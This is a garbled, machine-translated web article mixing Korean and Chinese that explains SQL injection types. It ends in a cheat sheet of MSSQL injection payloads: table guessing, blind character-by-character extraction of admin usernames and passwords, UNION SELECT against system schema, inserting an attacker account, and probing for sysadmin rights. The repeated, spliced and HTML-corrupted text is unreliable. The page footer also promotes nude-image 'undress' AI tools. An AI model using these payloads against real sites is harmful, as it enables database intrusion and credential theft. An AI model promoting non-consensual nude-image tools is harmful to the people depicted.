SQL 주입 문이란 무엇입니까?
SQL 주입 문에는 세 가지 유형이 있습니다. 1. "select * from table name where id=1 and 1=1"과 같은 문이 있는 숫자 주입 지점 2. "와 같은 문이 있는 문자 주입 지점 이름이..."인 테이블에서 *를 선택하십시오. 3. 주입 지점을 검색합니다.
이 문서의 운영 환경: Windows 7 시스템, SQL Server 2016 버전, Dell G3 컴퓨터.
일반적인 SQL 주입 문
SQL 주입
1. SQL 주입이란
웹 양식 제출에 SQL 명령을 삽입하거나 도메인 이름 또는 페이지 요청에 대한 쿼리 문자열을 입력하여 궁극적으로 서버를 속여 악성 SQL을 실행하게 합니다. 주문하다.
2. SQL 주입 유형
은 주입 지점 유형에 따라 분류됩니다.
(1) 숫자 주입 지점
많은 웹 링크가 유사한 구조를 가지고 있습니다. http://xxx.com/users.php?id=1 기반 이런 형태의 인젝션을 일반적으로 디지털 인젝션 포인트라고 부르는데, 이는 인젝션 포인트 ID 유형이 숫자이기 때문입니다. 사용자 개인정보 조회, 기사 조회 등 대부분의 웹페이지에서 이러한 형태의 구조를 사용하여 인젝션 포인트를 전달합니다. ID 정보가 백엔드로 전달될 때까지 기다린 후, 데이터베이스에서 해당 정보를 쿼리하여 프런트엔드로 반환합니다. 이러한 유형의 SQL 문의 프로토타입은 아마도 select * from table name where id=1
일 것입니다. 주입이 있는 경우 폭발을 위해 다음과 유사한 SQL 주입 문을 구성할 수 있습니다. select * id=1 및 1=1인 테이블 이름에서
select * from 表名 where id=1
若存在注入,我们可以构造出类似与如下的sql注入语句进行爆破:select * from 表名 where id=1 and 1=1
(2)字符型注入点
网页链接有类似的结构 http://xxx.com/users.php?name=admin 这种形式,其注入点 name 类型为字符类型,所以叫字符型注入点。这一类的 SQL 语句原型大概为 select * from 表名 where name='admin'
值得注意的是这里相比于数字型注入类型的sql语句原型多了引号,可以是单引号或者是双引号。若存在注入,我们可以构造出类似与如下的sql注入语句进行爆破:select * from 表名 where name='admin' and 1=1 '
我们需要将这些烦人的引号给处理掉。
(3)搜索型注入点
这是一类特殊的注入类型。这类注入主要是指在进行数据搜索时没过滤搜索参数,一般在链接地址中有 "keyword=关键字"
有的不显示在的链接地址里面,而是直接通过搜索框表单提交。此类注入点提交的 SQL 语句,其原形大致为:select * from 表名 where 字段 like '%关键字%'
若存在注入,我们可以构造出类似与如下的sql注入语句进行爆破:select * from 表名 where 字段 like '%测试%' and '%1%'='%1%'
(2) 문자 주입 지점웹 링크의 구조는 http://xxx.com/users와 비슷합니다. php?name=admin 의 형태로 주입점의 이름형이 문자형이므로 문자 주입점이라고 합니다. 이 유형의 SQL 문 프로토타입은 아마도 select * from table name where name='admin'
일 것입니다. 숫자 주입 유형 SQL 문 프로토타입에 비해 더 많은 따옴표가 있다는 점은 주목할 가치가 있습니다. 작은따옴표나 큰따옴표일 수 있습니다. 삽입이 있는 경우 다음과 유사한 SQL 삽입 문을 구성하여 폭발시킬 수 있습니다. select * from table name where name='admin' and 1=1 '
우리는 이러한 짜증나는 인용문을 처리해야 합니다. 패배를 표시합니다.
(3) 주입점 검색
이것은 특별한 형태의 주입입니다. 이러한 유형의 삽입은 주로 데이터 검색을 수행할 때 검색 매개변수를 필터링하지 않는 것을 의미합니다. 일반적으로 링크 주소에 "keyword=keyword"
가 포함되어 있지만 일부는 링크 주소에 표시되지 않습니다. Box 양식 제출을 통해 검색했습니다. 이러한 유형의 주입 지점에 의해 제출된 SQL 문의 프로토타입은 대략 다음과 같습니다. select * from table name where field like '%keyword%'
주입이 있는 경우 다음과 유사한 SQL 주입 문을 구성할 수 있습니다. 다음 분해: '%test%' 및 '%1%'='%1%'와 같은 필드가 있는 테이블 이름에서 * 선택
select * from table name where name='admin'
일 것입니다. 숫자 주입 유형 SQL 문 프로토타입에 비해 더 많은 따옴표가 있다는 점은 주목할 가치가 있습니다. 작은따옴표나 큰따옴표일 수 있습니다. 삽입이 있는 경우 다음과 유사한 SQL 삽입 문을 구성하여 폭발시킬 수 있습니다. select * from table name where name='admin' and 1=1 '
우리는 이러한 짜증나는 인용문을 처리해야 합니다. 패배를 표시합니다.
(3) 주입점 검색
데이터가 제출되는 방식에 따라 분류
(1) GET 주입데이터 제출 방식은 GET이며, 주입 지점 위치는 GET 매개변수 섹션에 있습니다. 예를 들어, http://xxx.com/news.php?id=1이라는 링크가 있고 id는 주입 지점입니다. (2) POST 주입POST 메소드를 사용하여 데이터를 제출합니다. 주입 지점은 양식에서 자주 발생하는 POST 데이터 부분에 있습니다. (3) 쿠키 주입HTTP 요청은 클라이언트의 쿠키를 가져오며, 쿠키의 특정 필드에 주입 지점이 존재합니다.주입 지점은 HTTP 요청 헤더의 특정 필드에 있습니다. 예를 들어 User-Agent 필드에 존재합니다. 엄밀히 말하면 쿠키는 실제로 헤더 삽입의 한 형태로 간주되어야 합니다. HTTP 요청 중에 쿠키는 헤더의 필드이기 때문입니다.(4) HTTP 헤더 주입
실행 효과에 따라 분류
(1) 불리언 기반 블라인드 주입은 반환 페이지를 기준으로 조건이 참인지 거짓인지 판단할 수 있는 주입입니다. (2) 시간 기반 블라인드 주입은 페이지에서 반환된 내용을 기반으로 어떤 정보도 판단할 수 없다는 의미입니다. 조건문을 사용하여 시간 지연 문이 실행되는지(즉, 페이지 반환 여부)를 확인할 수 있습니다. 시간이 늘어납니다.)- (3) 오류 보고 기반 주입
- 즉, 페이지에서 오류 정보를 반환하거나 주입된 문의 결과가 페이지에 직접 반환됩니다.
- 작은따옴표
큰따옴표
숫자 주입 기반
(4) Union 쿼리 주입Union Case Injection을 사용할 수 있습니다.
일반적으로 사용되는 명령문🎜1.判断有无注入点 ; and 1=1 and 1=2 2.猜表一般的表的名称无非是admin adminuser user pass password 等.. and 0<>(select count(*) from *) and 0<>(select count(*) from admin) ---判断是否存在admin这张表 3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个 and 0<(select count(*) from admin) and 1<(select count(*) from admin) 4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称. and 1=(select count(*) from admin where len(*)>0)-- and 1=(select count(*) from admin where len(用户字段名称name)>0) and 1=(select count(*) from admin where len(_blank>密码字段名称password)>0) 5.猜解各个字段的长度 猜解长度就是把>0变换 直到返回正确页面为止 and 1=(select count(*) from admin where len(*)>0) and 1=(select count(*) from admin where len(name)>6) 错误 and 1=(select count(*) from admin where len(name)>5) 正确 长度是6 and 1=(select count(*) from admin where len(name)=6) 正确 and 1=(select count(*) from admin where len(password)>11) 正确 and 1=(select count(*) from admin where len(password)>12) 错误 长度是12 and 1=(select count(*) from admin where len(password)=12) 正确 6.猜解字符 and 1=(select count(*) from admin where left(name,1)=a) ---猜解用户帐号的第一位 and 1=(select count(*) from admin where left(name,2)=ab)---猜解用户帐号的第二位 就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了 and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) -- 这个查询语句可以猜解中文的用户和_blank>密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符. group by users.id having 1=1-- group by users.id, users.username, users.password, users.privs having 1=1-- ; insert into users values( 666, attacker, foobar, 0xffff )-- UNION SELECT TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS WHERE TABLE_blank>_NAME=logintable- UNION SELECT TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS WHERE TABLE_blank>_NAME=logintable WHERE COLUMN_blank>_NAME NOT IN (login_blank >_id)- UNION SELECT TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS WHERE TABLE_blank>_NAME=logintable WHERE COLUMN_blank>_NAME NOT IN (login_blank >_id,login_blank>_name)- UNION SELECT TOP 1 login_blank>_name FROM logintable- UNION SELECT TOP 1 password FROM logintable where login_blank>_name=Rahul-- 看_blank>服务器打的补丁=出错了打了SP4补丁 and 1=(select @@VERSION)-- 看_blank>数据库连接账号的权限,返回正常,证明是_blank>服务器角色sysadmin权限。 and 1=(SELECT IS_blank>_SRVROLEMEMBER(sysadmin))-- 判断连接_blank>数据库帐号。(采用SA账号连接 返回正常=证明了连接账号是SA) and sa=(SELECT System_blank>_user)-- and user_blank>_name()=dbo-- and 0<>(select user_blank>_name()--
위 내용은 SQL 주입 문이란 무엇입니까?의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!

핫 AI 도구

Undresser.AI Undress
사실적인 누드 사진을 만들기 위한 AI 기반 앱

AI Clothes Remover
사진에서 옷을 제거하는 온라인 AI 도구입니다.

Undress AI Tool
무료로 이미지를 벗다

Clothoff.io
AI 옷 제거제

AI Hentai Generator
AI Hentai를 무료로 생성하십시오.

인기 기사

뜨거운 도구

메모장++7.3.1
사용하기 쉬운 무료 코드 편집기

SublimeText3 중국어 버전
중국어 버전, 사용하기 매우 쉽습니다.

스튜디오 13.0.1 보내기
강력한 PHP 통합 개발 환경

드림위버 CS6
시각적 웹 개발 도구

SublimeText3 Mac 버전
신 수준의 코드 편집 소프트웨어(SublimeText3)

뜨거운 주제











HQL과 SQL은 Hibernate 프레임워크에서 비교됩니다. HQL(1. 객체 지향 구문, 2. 데이터베이스 독립적 쿼리, 3. 유형 안전성), SQL은 데이터베이스를 직접 운영합니다(1. 데이터베이스 독립적 표준, 2. 복잡한 실행 파일) 쿼리 및 데이터 조작).

"OracleSQL의 나눗셈 연산 사용법" OracleSQL에서 나눗셈 연산은 일반적인 수학 연산 중 하나입니다. 데이터 쿼리 및 처리 중에 나누기 작업은 필드 간의 비율을 계산하거나 특정 값 간의 논리적 관계를 도출하는 데 도움이 될 수 있습니다. 이 문서에서는 OracleSQL의 나누기 작업 사용법을 소개하고 구체적인 코드 예제를 제공합니다. 1. OracleSQL의 두 가지 분할 연산 방식 OracleSQL에서는 두 가지 방식으로 분할 연산을 수행할 수 있습니다.

Oracle과 DB2는 일반적으로 사용되는 관계형 데이터베이스 관리 시스템으로, 각각 고유한 SQL 구문과 특성을 가지고 있습니다. 이 기사에서는 Oracle과 DB2의 SQL 구문을 비교 및 차이점을 설명하고 구체적인 코드 예제를 제공합니다. 데이터베이스 연결 Oracle에서는 다음 문을 사용하여 데이터베이스에 연결합니다. CONNECTusername/password@database DB2에서 데이터베이스에 연결하는 문은 다음과 같습니다. CONNECTTOdataba

MyBatis 동적 SQL 태그 해석: Set 태그 사용법에 대한 자세한 설명 MyBatis는 풍부한 동적 SQL 태그를 제공하고 데이터베이스 작업 명령문을 유연하게 구성할 수 있는 탁월한 지속성 계층 프레임워크입니다. 그 중 Set 태그는 업데이트 작업에서 매우 일반적으로 사용되는 UPDATE 문에서 SET 절을 생성하는 데 사용됩니다. 이 기사에서는 MyBatis에서 Set 태그의 사용법을 자세히 설명하고 특정 코드 예제를 통해 해당 기능을 보여줍니다. Set 태그란 무엇입니까? Set 태그는 MyBati에서 사용됩니다.

SQL에서 ID란 무엇입니까? SQL에서 ID는 자동 증가 숫자를 생성하는 데 사용되는 특수 데이터 유형으로, 테이블의 각 데이터 행을 고유하게 식별하는 데 사용됩니다. ID 열은 일반적으로 기본 키 열과 함께 사용되어 각 레코드에 고유한 식별자가 있는지 확인합니다. 이 문서에서는 Identity를 사용하는 방법과 몇 가지 실제 코드 예제를 자세히 설명합니다. Identity를 사용하는 기본 방법은 테이블을 생성할 때 Identit을 사용하는 것입니다.

Springboot+Mybatis-plus가 다중 테이블 추가 작업을 수행하기 위해 SQL 문을 사용하지 않을 때 내가 직면한 문제는 테스트 환경에서 생각을 시뮬레이션하여 분해됩니다. 매개 변수가 있는 BrandDTO 개체를 생성하여 배경으로 매개 변수 전달을 시뮬레이션합니다. Mybatis-plus에서 다중 테이블 작업을 수행하는 것은 매우 어렵다는 것을 Mybatis-plus-join과 같은 도구를 사용하지 않으면 해당 Mapper.xml 파일을 구성하고 냄새나고 긴 ResultMap만 구성하면 됩니다. 해당 SQL 문을 작성합니다. 이 방법은 번거로워 보이지만 매우 유연하며 다음을 수행할 수 있습니다.

해결 방법: 1. 로그인한 사용자에게 데이터베이스에 액세스하거나 운영할 수 있는 충분한 권한이 있는지 확인하고 해당 사용자에게 올바른 권한이 있는지 확인하십시오. 2. SQL Server 서비스 계정에 지정된 파일에 액세스할 수 있는 권한이 있는지 확인하십시오. 3. 지정된 데이터베이스 파일이 다른 프로세스에 의해 열렸거나 잠겼는지 확인하고 파일을 닫거나 해제한 후 쿼리를 다시 실행하십시오. .관리자로 Management Studio를 실행해 보세요.

MySQL에서 데이터 집계 및 통계를 위해 SQL 문을 사용하는 방법은 무엇입니까? 데이터 집계 및 통계는 데이터 분석 및 통계를 수행할 때 매우 중요한 단계입니다. 강력한 관계형 데이터베이스 관리 시스템인 MySQL은 데이터 집계 및 통계 작업을 쉽게 수행할 수 있는 풍부한 집계 및 통계 기능을 제공합니다. 이 기사에서는 SQL 문을 사용하여 MySQL에서 데이터 집계 및 통계를 수행하는 방법을 소개하고 구체적인 코드 예제를 제공합니다. 1. COUNT 함수를 사용합니다. COUNT 함수는 가장 일반적으로 사용됩니다.
